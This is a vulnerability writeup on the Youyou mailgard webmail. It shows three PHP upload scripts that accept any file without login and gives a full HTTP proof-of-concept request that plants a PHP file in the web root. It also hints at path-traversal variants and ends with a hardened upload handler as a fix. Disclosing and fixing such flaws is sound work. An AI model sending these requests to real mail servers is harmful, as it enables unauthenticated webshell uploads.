Youyou mailgard webmail: arbitrary file upload leads to getshell (no login required)
1. Unauthenticated access to some files (reachable without logging in)
Files that do not include global.php from the root directory can be accessed directly without being redirected to the login page.
So files that may be reachable without authentication can be found with:
$ find -name "*.php" | xargs grep -L -E "^require_once.+(\.\.\/global|[^/]global)\.php.+;$"
After discarding the uninteresting ones, several PHP files remain:
./overflow_alarm.php
./sms_send.php
./src/old.rule.php
./src/public_folders_upload.php
./src/big_attach.php
./src/big_att_upload.php
./src/read_data.php
./src/upload.php
./sync/linkman.php
2. Arbitrary file upload caused by the code
Look at the code of /src/big_att_upload.php. To spare the developers, the header comment is mosaicked.
<?php
/*
 + mosaic +
 | Author: Mosaic |
 + --------------------------------------------------------------------- +
*/
require_once('../config.php');
require_once('../functions/global.php');
if (isset($_POST["PHPSESSID"])) {
    session_id($_POST["PHPSESSID"]);
}
$realDir = realpath($_POST['dir']) . '/';
$goexpr = true;
if (isset($_FILES["Filedata"]) || is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] == 0) {
    $fStr = $_FILES["Filedata"]["name"];
    $fSize = getUnitSpace($_FILES["Filedata"]["size"]);
    $fArr = explode('.', $fStr);
    $fSuffix = end($fArr);
    $fPrefix = substr($fStr, 0, -(strlen($fSuffix) + 1));
    $movefile = $realDir . $fStr;
    $auton = 0;
    while ($goexpr) {
        if (is_file($movefile) && $_POST['attachtype'] == 'big_att') {
            $movefile = $realDir . $fPrefix . '(' . $auton . ').' . $fSuffix;
            $fStr = $fPrefix . '(' . $auton . ').' . $fSuffix;
            $auton++;
        } else {
            $goexpr = false;
        }
    }
    if (move_uploaded_file($_FILES["Filedata"]["tmp_name"], $movefile)) {
        if ($_POST['attachtype'] == 'big_att') {
            echo 'big_att:' . $fStr . ':' . $fSize;
            exit;
        } else {
            echo '1';
            exit;
        }
    }
}
?>
This is hard to believe: not only does the script run without authentication, it also places no restriction on the extension of the uploaded file.
The file is written under its original name straight into realpath($_POST['dir']) . '/'.
POC:
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1
Host: mail.domain.com:889
Connection: keep-alive
Content-Length: 658
Origin: http://mail.domain.com:889
X-Requested-With: ShockwaveFlash/16.0.0.305
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Accept: */*
Referer: http://mail.domain.com:889/src/write_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn

------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filename"

vultest.php
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="PHPSESSID"

outb98m2mckt5a03pejd1aqra0
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="dir"

/var/www/newmail/
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filedata"; filename="vultest.php"
Content-Type: application/octet-stream

12345
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Upload"

Submit Query
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
Then access http://mail.domain.com:889/vultest.php
There are two more upload points with the same problem. realpath() resolves ../, so you can work out the rest; I will not post a POC.
/var/www/newmail/src/upload.php:
<?php
/*
 + mosaic +
 | Author: Mosaic |
 + --------------------------------------------------------------------- +
*/
require_once('../config.php');
// network disk
// Work-around for setting up a session because Flash Player doesn't send the cookies
if (isset($_POST["PHPSESSID"])) {
    session_id($_POST["PHPSESSID"]);
}
$netDiskDir = HM_BOXS . $_POST['netDiskDir'];
$realDir = realpath($netDiskDir . '/' . $_POST['curdir']) . '/';
if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {
    $_FILES["Filedata"] = $_FILES["Filedata2"];
}
$goexpr = true;
if (isset($_FILES["Filedata"]) || is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] == 0) {
    $fStr = $_FILES["Filedata"]["name"];
    $fArr = explode('.', $fStr);
    $fSuffix = end($fArr);
    $fPrefix = substr($fStr, 0, -(strlen($fSuffix) + 1));
    $movefile = $realDir . $fStr;
    $auton = 0;
    while ($goexpr) {
        if (is_file($movefile)) {
            $movefile = $realDir . $fPrefix . '(' . $auton . ').' . $fSuffix;
            $auton++;
        } else {
            $goexpr = false;
        }
    }
    move_uploaded_file($_FILES["Filedata"]["tmp_name"], $movefile);
}
if (isset($_FILES["Filedata2"]) || is_uploaded_file($_FILES["Filedata2"]["tmp_name"]) || $_FILES["Filedata2"]["error"] == 0) {
    echo 'document.getElementById("show_Filedata2").innerHTML = \'<input type="file" id="Filedata2" name="Filedata2">\';'
       . 'document.getElementById("PHPUploadProgress").style.display = "none";'
       . 'document.getElementById("PHPUploadCompose").style.display = "";';
}
echo '';
exit;
?>
/var/www/newmail/src/public_folders_upload.php (realpath() resolves ../ here too, so the same applies; I will not post a POC):
<?php
/*
 + mosaic +
 | Author: Mosaic |
 + --------------------------------------------------------------------- +
*/
require_once('../config.php');
// public folder
// Work-around for setting up a session because Flash Player doesn't send the cookies
if (isset($_POST["PHPSESSID"])) {
    session_id($_POST["PHPSESSID"]);
}
$pubDir = HM_BOXS . $_POST['pubdir'];
$realDir = realpath($pubDir . '/' . $_POST['curdir']) . '/';
if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {
    $_FILES["Filedata"] = $_FILES["Filedata2"];
}
$goexpr = true;
if (isset($_FILES["Filedata"]) || is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] == 0) {
    $fStr = $_FILES["Filedata"]["name"];
    $fArr = explode('.', $fStr);
    $fSuffix = end($fArr);
    $fPrefix = substr($fStr, 0, -(strlen($fSuffix) + 1));
    $movefile = $realDir . $fStr;
    $auton = 0;
    while ($goexpr) {
        if (is_file($movefile)) {
            $movefile = $realDir . $fPrefix . '(' . $auton . ').' . $fSuffix;
            $auton++;
        } else {
            $goexpr = false;
        }
    }
    move_uploaded_file($_FILES["Filedata"]["tmp_name"], $movefile);
    exit;
}
if (isset($_FILES["Filedata2"]) || is_uploaded_file($_FILES["Filedata2"]["tmp_name"]) || $_FILES["Filedata2"]["error"] == 0) {
    echo '<script type="text/javascript">'
       . 'parent.document.getElementById("show_Filedata2").innerHTML = \'<input type="file" id="Filedata2" name="Filedata2">\';'
       . 'parent.document.getElementById("PHPUploadProgress").style.display = "none";'
       . 'parent.document.getElementById("PHPUploadCompose").style.display = "";'
       . '</script>';
}
echo '';
exit;
?>
Solution:
Filter the uploads.
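As an added example (not the vendor's code), this is what a handler of the kind shown above looks like once the filtering is in place. It addresses each of the three defects the writeup points out: it loads the root global.php so the login check applies, ignores any session id carried in the POST body, keeps the destination under a fixed server-side base and rejects ../ escapes after realpath() has resolved them, allow-lists the extension, and stores the file under a server-generated name. UPLOAD_BASE, the $_SESSION['user_id'] check and the extension list are assumptions made for this example, not names taken from the application.

```php
<?php
// Added example, not the application's own code. Assumed names: UPLOAD_BASE,
// $_SESSION['user_id'], and the $allowed extension list.

require_once '../config.php';
require_once '../global.php';   // the root global.php: the file whose absence let the originals run unauthenticated

// 1. Never accept a session id from the POST body (the Flash-era work-around
//    in the originals). Only the cookie-backed session counts.
if (empty($_SESSION['user_id'])) {           // assumed session key; adjust to the application
    http_response_code(403);
    exit('login required');
}

// 2. The destination is fixed on the server. The client may only name a
//    subfolder, and only one that matches a strict pattern (no slashes, no dots).
define('UPLOAD_BASE', '/var/www/newmail/attachments');   // assumed path; keep it outside the web root if possible
$subdir = isset($_POST['curdir']) ? $_POST['curdir'] : '';
if ($subdir !== '' && !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $subdir)) {
    http_response_code(400);
    exit('invalid directory');
}

// 3. Resolve the final directory and confirm it is still inside UPLOAD_BASE.
//    realpath() collapses ../, so compare the resolved prefix, not the raw string.
$base   = realpath(UPLOAD_BASE);
$target = realpath(UPLOAD_BASE . '/' . $subdir);
if ($base === false || $target === false
    || strncmp($target . '/', $base . '/', strlen($base) + 1) !== 0) {
    http_response_code(400);
    exit('invalid directory');
}

// 4. Basic upload sanity checks: the upload must exist, have no error, and be
//    a genuine uploaded temp file.
if (!isset($_FILES['Filedata'])
    || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES['Filedata']['tmp_name'])) {
    http_response_code(400);
    exit('no file');
}

// 5. Allow-list the extension (assumed list). The client-supplied MIME type is
//    never consulted, and the check is case-insensitive so "x.PHP" is not a bypass.
$allowed = ['pdf', 'png', 'jpg', 'jpeg', 'gif', 'txt', 'zip'];
$ext = strtolower(pathinfo($_FILES['Filedata']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) {
    http_response_code(415);
    exit('file type not allowed');
}

// 6. Store under a server-generated name so the original filename never
//    reaches the filesystem (random_bytes() needs PHP 7 or newer).
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
$dest   = $target . '/' . $stored;
if (!move_uploaded_file($_FILES['Filedata']['tmp_name'], $dest)) {
    http_response_code(500);
    exit('upload failed');
}
chmod($dest, 0644);   // no execute bit; the directory should also be served without PHP execution

header('Content-Type: application/json');
echo json_encode(['stored' => $stored, 'size' => $_FILES['Filedata']['size']]);
```

The containment check in step 3 is the part that the three original scripts lack: they call realpath() on a client-supplied path and then trust the result, whereas here the resolved path is compared against the resolved base with a trailing slash so that a sibling directory such as /var/www/newmail/attachments2 cannot pass as a prefix match. Step 6 means that even if the allow-list were ever relaxed, the attacker would not control the stored filename.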